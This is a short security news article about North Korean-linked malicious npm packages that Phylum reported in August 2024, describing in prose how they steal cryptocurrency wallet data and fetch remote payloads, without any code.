A recent surge in malicious activity involving North Korean-linked threat groups has been identified by cybersecurity researchers, revealing a coordinated campaign targeting the npm ecosystem.
The campaign began on August 12 2024, and involved publishing malicious npm packages designed to infiltrate developer environments and steal sensitive data.
The newly discovered packages, including temp-etherscan-api, ethersscan-api and telegram-con, exhibit sophisticated tactics such as multi-stage obfuscated JavaScript that downloads additional malware from remote servers.
Malicious npm Packages
According to a blog post published by Phylum today, the malware includes Python scripts and a full Python interpreter, which search for data in cryptocurrency wallet browser extensions while establishing persistence on the affected systems. Notably, the qq-console package is attributed to a known North Korean campaign named “Contagious Interview.”
Researchers identified another package, helmet-validate, published on August 23 2024, which employs a different attack method. It inserts JavaScript code that retrieves and executes malicious code from a remote endpoint, ipcheck[.]cloud. This domain is linked to previous North Korean operations, including fake job campaigns using the mirotalk[.]net domain, highlighting a pattern of recurring tactics.
The most recent package, sass-notification, was published on August 27 2024, and is linked to the “Moonstone Sleet” campaign. This package uses obfuscated JavaScript to run scripts that download, decrypt and execute remote payloads while removing traces of malicious activity, leaving behind what appears to be harmless software.
Increasing Exploitation of npm By Threat Actors
Phylum warned these attacks underscore the increasing exploitation of npm by threat actors to compromise developer systems.
“The diversity and simultaneous deployment of these attack vectors reveal a coordinated and relentless campaign by North Korean-aligned threat actors,” the company said.
“These adversaries continuously exploit the inherent trust in the npm ecosystem to compromise developers, infiltrate companies and steal cryptocurrency or any other assets that could lead to illicit financial gains.”